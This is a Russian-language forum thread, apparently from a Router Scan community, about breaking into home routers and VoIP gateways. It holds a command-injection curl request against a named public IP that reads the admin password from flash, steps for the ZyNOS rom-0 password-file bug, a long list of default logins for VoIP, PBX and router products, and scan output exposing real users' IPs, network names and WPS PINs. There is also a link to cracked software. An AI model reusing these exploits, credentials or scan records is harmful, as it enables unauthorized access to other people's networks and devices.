Посмотрел прошивку, в вольном пересказе это выглядит так: Spoiler: Выполнение команды Code: cmd_tmpl = "/www/cgi-bin/%s > /tmp/cgi_result"; sprintf(cmd, cmd_tmpl, cgi_name); system(cmd); Spoiler: Формирование ответа Code: fid_res = fopen("/tmp/cgi_result", "r"); if ( fid_res ) { while ( fgets(line, 0xFFFF, fid_res) ) { p_status_start = strstr(line, "Status:"); if ( p_status_start ) { strcpy(status, p_status_start + 7); p_status_end = strchr(status, 10); if ( p_status_end ) *p_status_end = 0; sprintf(http_hdr, "HTTP/1.1%s\r\n", status); } else { strcat(http_hdr, line); } } fclose(fid_res); } strcat(http_hdr, "\r\n"); send_pkt(v5, http_hdr, strlen(http_hdr), 0); ; В соответствии с этим изменил запрос: Code: curl 'https://97.94.205.2l:8443/cgi-bin/;echo$IFS-e$IFS"Status:\x20200\x20OK\r\n\r\n"`grep$IFS-m1$IFS"http_passwd"$IFS$PWD"dev"$PWD"mtd1"`' -k
Теперь надо придумать, как всё это (особенно \r\n в запросе) запихнуть в эксплойт Router Scan - всё бы ничего, если не дополнительный SSL слой (https/8443).
Попросить нас добавить роутер в поддержку, перед этим соблюдая все процедуры оформления заявки (учитывая, что роутер скорее всего доступен лишь вам, а извне нет). Это выходит за рамки данной темы, пишите в 3WiFi.
тут нашлось такое дело " TP-Link и Zyxel имеется уязвимость. Через этот баг можно удаленно вытащить файл с пассами. скрипт для тестирования роутеров https://github.com/MrNasro/zynos-attacker/ с его помощью можно тестировать свой и чужой роутер Тестируем на баг 1) Открываем http://rom-0.cz/index/ и чекаем свой модем 2) Чтобы чекать в ручном режиме вконец айпи добавляем /rom-0 пример 192.168.1.1/rom-0 3) Скачанный файл декодируем тут http://www.routerpwn.com/zynos/ " кто-то пробовал это дело и можно ли эти уязвимости привязать к РС ?
как-то тут ранее на форуме возникала тема. может кому нужен charles (ну не нашим гуру у них давно уже все есть и работает ) наткнулся на версию 3.11.2 с кр. на рутор орг. вроде работает http://rutracker.org/forum/viewtopic.php?t=2114687
интересные дефолты на некоторые роутеры. есть довольно не часто встречаемые Spoiler: pass اسماء router voip ********************** FS/BOARD.ini Audiocodes cgi-bin/download_cfg GrandStreem /all.prm startup.cfg patton backuprestoreconf.cgi epygi rg_conf.cgi PIRELLI ========================================== FusionPBX user: superadmin password: fusionpbx user: admin password: fusionpbx =============================== tiptel ادمن ادمن ويوزر يوز patton smartlink user zyxel 1234 VOIP_SIP.html admin 1234 mDefault console login Default web login http://bestfreevpn.com/ http://80.253.28.22/cgi-bin/config http://www.tftp-server.com/tftp-download.html ======================================== Smart VoIP IAD root ... This unit is password protected root .... ============================================= jungo jrms admin Telnet jungo admin admin Telsey su system root default rouser default webadmin BIllon admin admin Enter Network Password (voip) root null Please input username/password" Planet / guest guest Please inter your username and password Astra / admin 22222 webserver /user user Enterprise IP phone SIP-T22P yalink admin admin Web Server VoIP Getway root root <<< user user 2AFXS Configuration Web Server root null 4AFXS Gateway root null user= 6091 pass= 6092 HomeGetway admin admin ========================================== /modules /modules/extensions_batch/libs/download_csv.php Username: root Password: palosanto demo tribox wwwadmin password Elastix asteriskuser eLaStIx.asteriskuser.2oo7 Elastix admin palosanto freePBX asteriskuser amp109 freePBX asteriskuser amp110 freePBX admin secret123password freePBX admin admin FreePBX freepbx fpbx freePBX meetme password asterisk asterisk 123456 astrisk admin amp110 astrisk maint password 60000334 asterisk 1 admin elastix456 FOP admin eLaStIx.2oo7 MySQL root eLaStIx.2oo7 A2Billing admin mypassword A2Billing root 1nt3rn3t ARI admin password SugarCRM admin password A2Billing root myroot A2Billing admin mypassword --------------------------------------- SMC7904BRA3 admin smcadmin Patton SN4960 administrator aethra admin admin aethra aethra aethra comrex comrex comrex Gigaset s685 0000 --------------------------------------- Interface Login Password Avantfax admin password vTiger admin admin MEDIATRIX admin 1234 Nortel (BCM) admin setup user user Admin Nortel user user VoIP-GSM VoIP 1234 VoIP-GSM admin 99admin11 VoIP-GSM advanced 99advanced11 VoIP-GSM root 91qwerty19 VoIP-GSM gsmgw 5tgb4rf telnet port=2222 Openfire admin Whatever set at install SuperMicro ADMIN ADMIN ipecs 2222 22222 Yeastar MYPBX admin password mintel system password Aventfax admin password Zynetix admin admin iSurf 1008IAD admin admin sipura admin admin or scopia100 admin SCOPIA100 or scopia100 Vegastream admin admin EasyPhone admin admin voip router voip 1234 voip phone admin 1234 voip phone guest guest روسي INTELBRAS user user PLEXTEL admin 1234 ezvoice PBX admin password Vigor admin admin او بدون يوزر pbxnsip admin password accessavant fax admin password kamailio admin 2222 Aastra admin 22222 HelloVoIP admin admin zyxel admin 1234 grandstream admin 123 antek_SIP antek antek Toex voibridge admin 99admin11 OV3600 root admin Sonicwall admin password Gesta gesta Briker IPPBX Briker Briker IPPBX support Briker PCS-TL50 sonypcs (blank) Swissvoice admin admin DPH-150SE admin admin Platan PBX Platan 12345678 AvantFAX admin password InnoMedia Admin password skymax admin sky or skymax Matrix admin 1234 InnoMedia A/admin password Sip-MTA Admin password TalkSwitch admin 22222 ContactQ admin admin ProCurve manager webpw NETVANTA admin password :telnet = adtran password Vyatta vyatta vyatta zultys -- 1234 fox gateway root administrator HUAWEI super super Sip ATA admin admin Linksis ----- admin. IC-Talk admin icvoip IC-Talk setup wwwadmin icvoip TIGERNETCOM admin ETX admin admin TalkTone admin admin 3StarsNet guest guest 3StarsNet admin admin VidyoGateway admin password NETGEAR admin password Phonik admin 1234 iSurf admin admin smartAX admin admin IPcam admin admin Switchvox admin admin VoIPNOW admin welcome BILLION BiPAC admin admin Ruckus admin password SpeedTouch Administrator --- EchoLife admin admin --------------------------------------- eLaStIx tribox wwwadmin password FreePBX fpbx freepbx fpbx admin: admin admin: password admin: passworm maint: admin maint: maintmai maint: password maint: passworm admin palosanto admin elastix456 asteriskuser eLaStIx.asteriskuser.2oo7 --------------------------------------- Asterisk mySQL User: asteriskuser amp109 User: admin amp110 Asterisk: maint password --------------------------------------- plextel admin voip admin admin user voip user user plextel admin 1234 --------------------------------------- 1AFXS Gateway 2AFXS Gateway 4AFXS Gateway 41.213.41.100 administrator null root null user= 6091 pass= 6092 ----------------------------------- MITEL Username: admin Password <modelnumber> or mitel5220 Mitel system password --------------------------------------- TELES root passs teles tcs-ag مجرب وفتح --------------------------------------- POLYCOMSoundPointIP Polycom 456 admin admin --------------------------------------- zyxel "P-660R-T1 v3s" admin 1234 admin admin --------------------------------------- Yealink admin admin user user --------------------------------------- AddPac admin-root router siscomp 515c0mp --------------------------------------- dlink / Taitell for Login ID and Password are blank ( no login ID, no password).) The -بدون -بدون Admin Admin Admin -بدون admin admin admin -بدون user -بدون -بدون user D-LINK d-link --------------------------------------- NEC CM650 ADMIN1 0000 ADMIN2 9999 USER1 1111 --------------------------------------- VoIP Gateway .... VoIP Gateway admin admin VoIP Gateway guest guest الفيراني VoIP Gateway root root VoIP Gateway User User su su VoIP Gateway admin 1234 VoIP Gateway admin 1111 VoIP Gateway admin 22222 VOIP GATEWAYA8 roo gohigh jensen voip gateway root root jensen voip gateway user user --------------------------------------- VoIPtel root admin mysecret --------------------------------------- Zabbix admin دون باسورد --------------------------------------- Audiocodes Admin Admin User User Admin 5 --------------------------------------- IP phone admin admin root 1234 root 1111 --------------------------------------- aastra300 admin sesam termnal root --------------------------------------- convergex admin admin user Guest --------------------------------------- edgeBOX guest guest super super --------------------------------------- ATA 740 0000 admin admin user user --------------------------------------- linksys Administrator admin admin admin comcast 1234 n/a admin --------------------------------------- AskoziaPBX 1ة root askozia 02555555 password --------------------------------------- default level 15 cisco cisco Cisco Cisco admin admin admin cisco administrator password administrator admin NONE cisco --------------------------------------- TANDBERG admin cisco admin admin admin TANDBERG (none) TANDBERG admin (none) cisco admin system root c/Cisco --------------------------------------- Brekeke sa sa sa 6636 --------------------------------------- OMEGA VoIP module Admin ----- User ----- Groups ----- --------------------------------------- AUDIT USER ADMIN --------------------------------------- Digium-AsteriskVox admin admin admin password --------------------------------------- VOS 3000 ipphone 1234 ipphone 123456 ---------------------------- TOS 3000 support / support user/user admin1234 / 123456 --------------------------------------- AlterCallSwitch user=Alter-test pass=test123 --------------------------------------- --------------------------------------- Planet Telephony Please input username/password" guest guest ----------------------- PLANET epicrouter admin 1234 admin admin root {null} user user --------------------------------------- Goautodial vicidialnow admin Goautodial root vicidialnow admin vicidialnow agent001 test admin vicidialnow 68.179.94.131 root my root admin my password Digivoice admin digi VDAD donotedit admin Admin agent001 agent001 agent002 agent002 4000 clientname VICI-PROJECTS cc102 test --------------------------------------- AVAYA diag danger manuf xxyyzz root root craft crftpw dadmin dadmin01 --------------------------------------- http://119.46.142.213/ IP PBX 222222222222222222222 Web= admin/admin SSH= root/uClinux or root/12xerXes06 --------------------------------------- Hanlong ICORN6004 admin 1234 --------------------------------------- iSurf 1004 IAD admin admin --------------------------------------- VideoPhone- admin admin user user user 123456 1234 --------------------------------------- Tilgin Vood "i3micro VRG" conf admin SubA SubA admin admin --------------------------------------- draytek (Vigor) admin admin admin ---- admin user user draytek 1234 for telnet --------------------------------------- innovaphone admin ip20 ip3000 ip305 ip305Behee ip400 ip200 ip6000 ip2000 --------------------------------------- Total Access 908e Total Access 916e Total Access 924e admin password ................................. ADTRAN Total Access 916e Usernames: *leave the field blank*, admin, user, username Passwords: *leave the field blank*, admin, pass, password 908 (2nd Gen) admin password telnet pass= adtran -------------------------------------- level 15 access administrator password cisco cisco cisco Cisco -------------------------------------- Gaoke MG6002 MG6000 Serial Home Gateway admin admin guest guest -------------------------------------- NB12WD: NetComm <<< Dynalink admin admin user user sup... ********************************* ********************************* SIP Phone admin 1234 ----------------- index admin 1234 ------------------------------ ======================================= T28 2.3.0.30 admin/admin user/user ---------------------------- media access gate away guest/guest admin admin senior system --------------------------- username "admin" password "password" username "dns" password "dnetit!bang!" =========================== الزرقا بدون ---------------------------- ادباك radical htibkfaddpac radical htibkfaddpac ---------------------------------- Dble ADMIN_PASSWORD="admin" USER_PASSWORD="1234" admin/admin ========================= vwusr ==================== user guide ================== vsportal/vsportal.swf?admin admin admin123 Admin Demo123 Test Test123 ===================================== Secure Access antek antek ================================== webadmin username admin password admin ** username engineer password engineer ================================ v+SdstnPq74= admin =============================== . root default ========================== pirelli admin admin SMC admin smcadmin TANDBERG admin TANDBERG i3micro Vood 422 Adsl Modem lautet: Username: Conf Password: admin confadm . administrator quescom ==================================== EchoLife Home Gateway admin admin -------------------------------------- Speedtouch 510 Speedtouch 530 SpeedTouch 536 SpeedTouch 546 SpeedTouch 570 SpeedTouch 580 SpeedTouch 585 user = Administrator Password = ............... AX-112W admin admin =============================== Patton SN4960 1E30V Patton SN4634 3BIS 00A0BA04FF administrator بدون =============================== Configuration Access administrator بدون =============================== VoIP Gateway Configuration Menu administrator بدون VoIP box admin 1234 ----------------------------- EchoLife Home Gateway admin / admin ================================= Please input username/password" guest guest admin --- inter your username and password admin 22222 webserver /user user ====================================== Epygi Quadro SIP User admin 19 1919 ================================== nec mercerct 14820103 alcockja 3015 USER1 1111 tech 12345678 nec99 632927 ADMIN1 0000 ADMIN2 9999 Aspire 12345678 ------------------------ yealink admin/admin ------------------ friendly-scanner على البرنامج مباشرة 1001/1234 --------------------------- A2Billing admin mypassword root 1nt3rn3t --------------------------- astium user: system / password: admin ------------------------------ Prestige 623R-A1 admin 1234 ============================ Air os user user =================================== streaming_server guest guest ------------------------------------ Venus 2908/SIP admin/admin ========================= VoIB Card Remote root ------------------ mera 1001/1001 برنامج ---------------------- SAGEM user user root 1234 ----------------------- webuser user user ---------- AX-112 root root -------------------------- adsl router root 12345 root d4rbyp4ss admin/system adnu10gh 383chevy admin nimda support nimda user northstate admin 42129827 فنزولا admin 5xwan 383chevy 5xwan . dsl 101 abc123 اوكرانيا admin Klp055ji سلفاكيا admin foxjenifer اطاليا admin r!cc@rd0 smtemi$ aoh4444xu7d support cnceqgy سورنامى root b3h4d5l ================================ brcm ام الاطار البنفسجي بس اكستنشن 1001 1002 1003 1004 =============================== ejoin epyg حطهن عالبرنامج 100 100 101 101 ========================= root root ================================== user 1234 ================================= ipecs lg -ericsson lg- nortel ======================= planet / ATA VoIP Adapter super super --------------------- cisco /tand admin admin ADMIN USER AUDIT ======================= topex admin 99admin11 ------------------------------------------ seowonintech wimax admin admin ============================ +37037777642 سنوم Admin User Administrator وحدة لفوق او عالبرنامج عطول وغير اليوز 333 333 ============================= 24port_gw admin admin ============================== VoIP Device WEB Management admin admin ========================== Exper - ECM-01 (Exper Turkish Firmware) admin ttnet تشيلي adsl admin TelefonicaSur7 ================================= Gizmo xxx.xxx.xxx.x/Voice_adminPage.htm admin slipshot =========================================== EchoLife user user mediatrix user=public ATA VoIP Adapter super super SMG1016 admin rootpasswd MxSipApp MEDIATRIX admin admin admin 1234 public 1234 public public ======================================= MERA DAMOS mera delink admin متغير qwerty asdfg zxcvb 123456 ==================================== IMX 1001/1234 عالبرنامج =================== iPECS DB_SIPSTA600.str?DBNAME=DB_SIPSTA 220.78.104.201\DB_SIPSTA600.str?DBNAME=DB_SIPSTA =================== admin/spacfg.xml linksys ==================== BCM Username: administrator Password: PlsChgMe! ===================== TalkSwitch يوزراتوا 111 112 113 4114 115 116 117 118 119 151 152 153 154 155 =================================== Hp4 100/100 --------------------------------- tiptel intelbras 333.333.444.44/index.htm user user admin admin ======================================== innomedia Admin password =============================== T10T admin or user ============================ VG-1D2V/DMA0027-R2L480 admin ссылка https://www.facebook.com/permalink.php?story_fbid=10152108647168705&id=1414817015437518 сам еще толком не разобразобрался что к чему. буду рад,если кто поделится мнением. есть смутное подозрение,что этот чел. связан с ХГ марокан милитари. те поделились т.с.информацией
Не считывает пароли. Всё есть, а паролей фиг. Впрочем из через конфиг можно вытащить. Строчка WLAN_WPA_PSK Spoiler: Realtek "IP Address";"Port";"Time (ms)";"Status";"Authorization";"Server name / Realm name / Device type";"Radio Off";"Hidden";"BSSID";"ESSID";"Security";"Key";"WPS PIN";"LAN IP Address";"LAN Subnet Mask";"WAN IP Address";"WAN Subnet Mask";"WAN Gateway";"Domain Name Servers";"Latitude";"Longitude";"Comments" "83.50.43.82";"80";"62";"Done";"adsl:realtek";"Realtek (OBSERVA TELECOM, AW4062 | 2.9.0.3x)";"";"";"00:E0:4C:07:68:02";"EALMOHALLA";"";"";"12345670";"";"";"83.50.43.82";"";"192.168.144.1";"185.55.218.219 8.8.8.8";"";"";"" "83.50.46.139";"80";"78";"Done";"adsl:realtek";"Realtek (OBSERVA TELECOM, AW4062 | 2.9.0.3x)";"";"";"00:E0:4C:07:68:02";"WLAN_AA25";"";"";"12345670";"";"";"83.50.46.139";"";"192.168.144.1";"185.55.218.219 8.8.8.8";"";"";"" "83.50.47.50";"80";"78";"Done";"adsl:realtek";"Realtek (OBSERVA TELECOM, AW4062 | 2.9.0.3x)";"";"";"00:E0:4C:07:68:02";"Andrea";"WEP";"";"12345670";"";"";"83.50.47.50";"";"192.168.144.1";"185.55.218.219 8.8.8.8";"";"";"" "83.50.65.134";"80";"78";"Done";"adsl:realtek";"Realtek (OBSERVA TELECOM, AW4062 | 2.9.0.3x)";"";"";"00:E0:4C:07:68:02";"casa";"";"";"12345670";"";"";"83.50.65.134";"";"192.168.144.1";"185.55.218.219 8.8.8.8";"";"";"" "83.50.79.3";"80";"78";"Done";"adsl:realtek";"Realtek (OBSERVA TELECOM, AW4062 | 2.9.0.3x)";"";"";"00:E0:4C:07:68:02";"WLAN_AB4F";"";"";"12345670";"";"";"83.50.79.3";"";"80.58.67.87";"185.55.218.219 8.8.8.8";"";"";"" "83.50.107.72";"80";"93";"Done";"adsl:realtek";"Realtek (OBSERVA TELECOM, AW4062 | 2.9.0.3x)";"";"";"00:E0:4C:07:68:02";"juanma";"";"";"12345670";"";"";"83.50.107.72";"";"80.58.67.140";"185.55.218.219 8.8.8.8";"";"";"" "83.50.119.29";"80";"78";"Done";"adsl:realtek";"Realtek (OBSERVA TELECOM, AW4062 | 2.9.0.3x)";"[X]";"";"00:E0:4C:07:68:02";"WLAN_EC6D";"";"";"12345670";"";"";"83.50.119.29";"";"80.58.67.170";"185.55.218.219 8.8.8.8";"";"";""
А мне вот внешних модулей в RS не хватает. К примеру пишем консольное приложение на любом языке под какую то конкретную уязвимость. На входе в ParamStr(1) ip, в случае удачи на выходе csv в папке обмена, а rs раз в минуту проверяет эту папку на наличие новых файлов и подхватывает из неё данные. А запуск... Ну можно фильтры как-нибудь для этого дела прикрутить. Получаем расширяемость и уходим от жесткой привязки к http
И в придачу 100% нагрузку процессора, даже многоядерного, на "густых" диапазонах. Это касается создания множества копий доп. процессов. Пофиксил.
Да, пожалуй вы правы, но можно запускать внешние процессы в общих рамках. Возникает некоторый гемор с отслеживанием их завершения, но это вполне всё решаемо. Впрочем вам виднее P.S. А ссылку на фикс?